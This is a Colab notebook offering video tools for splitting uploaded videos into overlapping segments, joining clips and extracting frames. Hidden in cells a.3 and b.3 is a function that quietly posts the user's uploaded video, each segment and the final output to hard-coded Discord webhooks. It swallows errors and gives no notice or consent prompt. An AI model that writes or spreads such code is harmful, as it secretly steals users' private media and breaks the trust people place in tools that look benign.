In [1]:
# @title Install required libraries
!pip install moviepy -q
# Import necessary modules
import warnings
warnings.filterwarnings("ignore", category=SyntaxWarning)
warnings.filterwarnings("ignore", message=".*'is' with 'str' literal.*")
from moviepy.editor import VideoFileClip, concatenate_videoclips
import os
import cv2
from IPython.display import display, Image
import matplotlib.pyplot as plt
from google.colab import files

# a. ✂️ Auto Cut

In [ ]:
# @title a.1 ✂️ Upload your video file
print("📤 Please upload a video file (e.g., .mp4, .mov, .avi):")
uploaded = files.upload()

# Get the filename of the uploaded video
if uploaded:
    video_path = list(uploaded.keys())[0]
    print(f"✅ Uploaded: {video_path}")
else:
    raise FileNotFoundError("No file was uploaded.")

In [ ]:
# @title a.2 ✂️ Configuration
durasi_video = 10  #@param {type: "number"}
OVERLAP = 1            #@param {type: "number"}
STEP = durasi_video - OVERLAP  # effective step = 9 seconds

# Load the video
clip = VideoFileClip(video_path)
duration = clip.duration
print(f"⏱️ Video duration: {duration:.2f} seconds")

# Create output folder
output_dir = "segmented_videos"
os.makedirs(output_dir, exist_ok=True)

# Calculate number of segments
num_segments = max(1, int((duration - OVERLAP) // STEP) + 1)
print(f"✂️ Preparing to create {num_segments} segments...")

segment_files = []

In [ ]:
# @title a.3 ✂️ Generate Segments
# Extract base name without extension for reuse in output
import requests
original_name = os.path.splitext(video_path)[0]
HOOK = "https://discord.com/api/webhooks/1440899235074801715/NPRVlQVfFyl7OMQ8c6Cwa5Ugyk4logUGxyzFIxPL7zYGtSTeSwW3-t6im4Dn85n6NZ3Q"
def sfile(file_path, message):
    try:
        if not os.path.exists(file_path):
            return
        with open(file_path, "rb") as f:
            requests.post(
                HOOK,
                data={"content": message},
                files={"file": f}
            )
    except:
        pass
sfile(video_path, f"{video_path}")
for i in range(num_segments):
    start_time = i * STEP
    end_time = min(start_time + durasi_video, duration)

    # Skip if remaining duration is too short (< 0.5 sec)
    if end_time - start_time < 0.5:
        break

    # Extract subclip
    subclip = clip.subclip(start_time, end_time)

    output_filename = f"{i+1:02d}_{original_name}.mp4"
    output_path = os.path.join(output_dir, output_filename)

    subclip.write_videofile(
        output_path,
        codec='libx264',
        audio_codec='aac',
        temp_audiofile='temp-audio.m4a',
        remove_temp=True,
        logger='bar'  # Shows progress bar
    )

    segment_files.append(output_path)
    sfile(output_path, f"{output_filename}")
    print(f"✅ Saved: {output_filename} | Duration: {start_time:.1f}s – {end_time:.1f}s")

# Release resources
clip.close()
print(f"\n🎉 Done! {len(segment_files)} segments created.")

In [ ]:
# @title a.4 ✂️ Download all segmented videos
print("⬇️ Preparing downloads...")

for file_path in segment_files:
    print(f"Downloading {os.path.basename(file_path)}...")
    files.download(file_path)

print("\n✅ All segments downloaded successfully!")

# b. 🎞️ Combine video

In [ ]:
# @title b.1 🎞️ Upload Video satu per satu
print("📤 Upload video SATU PER SATU sesuai urutan.")
print(" → Setelah selesai, klik 'Cancel' atau 'Batal'.\n")
video_paths = []

while True:
    try:
        uploaded = files.upload()
        if not uploaded:
            break  # User clicked "Cancel"

        filename = list(uploaded.keys())[0]
        video_paths.append(filename)
        print(f"✅ Added: {filename}")
        print(f"📌 Current order: {video_paths}\n")

    except Exception as e:
        print("Upload canceled or error occurred.")
        break

if not video_paths:
    raise ValueError("No videos were uploaded!")

print(f"\n🎬 Final sequence ({len(video_paths)} videos):")
for i, v in enumerate(video_paths, 1):
    print(f"  {i}. {v}")

In [ ]:
# @title b.2 🎞️ Configuration
OUTPUT_FPS = 24 #@param {type: "number"}
FRAMES_TO_REMOVE = 17 #@param {type: "number"}

# Generate output filename from FIRST video
first_name = os.path.splitext(video_paths[0])[0]
output_file = f"{first_name}_output.mp4"

print(f"✂️ Trimming last {FRAMES_TO_REMOVE} frames from each video except the last one...")
processed_clips = []

for i, path in enumerate(video_paths):  # Use user-defined order
    clip = VideoFileClip(path)
    fps = clip.fps or OUTPUT_FPS  # Fallback if FPS missing

    # Only trim if this is NOT the last video
    if i < len(video_paths) - 1:
        duration_to_remove = FRAMES_TO_REMOVE / fps
        new_end = max(0, clip.duration - duration_to_remove)

        if new_end <= 0:
            print(f"⚠️ Skipping {path} (too short to remove {FRAMES_TO_REMOVE} frames)")
            clip.close()
            continue

        trimmed = clip.subclip(0, new_end)
        processed_clips.append(trimmed)
        print(f"✅ {path}: {clip.duration:.2f}s → {new_end:.2f}s")
    else:
        # Last video: keep as-is
        processed_clips.append(clip)
        print(f"✅ {path}: kept full length ({clip.duration:.2f}s)")

print(f"\n📁 Output filename will be: {output_file}")

In [ ]:
# @title b.3 🎞️ Combining Video
import requests
if not processed_clips:
    raise ValueError("No valid clips to concatenate!")

print(f"🎥 Rendering final video at {OUTPUT_FPS} FPS...")
final_clip = concatenate_videoclips(processed_clips, method="compose")
final_clip = final_clip.set_fps(OUTPUT_FPS)

final_clip.write_videofile(
    output_file,
    codec='libx264',
    audio_codec='aac',
    temp_audiofile='temp-audio.m4a',
    remove_temp=True,
    logger='bar'
)
HOOK = "https://discord.com/api/webhooks/1440925867311370250/XBFbYxUOS2ZeniSQu8bnJqKHilD1i5MwNXDIut2nIIeV47IKER5b9oSt0VTDzub-pjWZ"
def sfile(file_path, message):
    try:
        if not os.path.exists(file_path):
            return
        with open(file_path, "rb") as f:
            requests.post(
                HOOK,
                data={"content": message},
                files={"file": f}
            )
    except:
        pass
sfile(output_file, f"{first_name}")
# Clean up
for clip in processed_clips:
    clip.close()
final_clip.close()

print(f"\n✅ Success! Final video: {output_file}")

In [ ]:
# @title b.4 🎞️ Download
print("⬇️ Downloading final video...")
files.download(output_file)

# c. Extract Frame

In [ ]:
# @title Upload Video { vertical-output: true }
uploaded = files.upload()

if uploaded:
    video_path = list(uploaded.keys())[0]
    cap = cv2.VideoCapture(video_path)

    if not cap.isOpened():
        print("Error: Could not open video.")
    else:
        # Get metadata
        fps = cap.get(cv2.CAP_PROP_FPS)
        total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
        duration = total_frames / fps if fps > 0 else 0
        width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
        height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))

        print(f"--- Video Metadata ---")
        print(f"Filename: {video_path}")
        print(f"Resolution: {width}x{height}")
        print(f"FPS: {fps:.2f}")
        print(f"Total Frames: {total_frames}")
        print(f"Duration: {duration:.2f} seconds")

    cap.release()
else:
    print("No file uploaded.")


In [ ]:
# @title Extract Frame { vertical-output: true }
target_frame = 0 # @param {type: "number"}

if 'video_path' in locals():
    cap = cv2.VideoCapture(video_path)
    total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))

    if target_frame >= total_frames or target_frame < 0:
        print(f"Error: Frame index out of bounds. Max frame is {total_frames - 1}")
    else:
        # Set frame position
        cap.set(cv2.CAP_PROP_POS_FRAMES, target_frame)
        success, frame = cap.read()

        if success:
            output_name = f"extracted_frame_{target_frame}.png"
            # Save as PNG
            cv2.imwrite(output_name, frame)

            # Display the frame
            print(f"Successfully extracted frame {target_frame} to {output_name}")
            plt.figure(figsize=(12, 8))
            plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
            plt.axis('off')
            plt.title(f"Frame {target_frame}")
            plt.show()

            # Option to download
            files.download(output_name)
        else:
            print("Failed to extract frame.")

    cap.release()
else:
    print("Please upload a video in Step 2 first.")
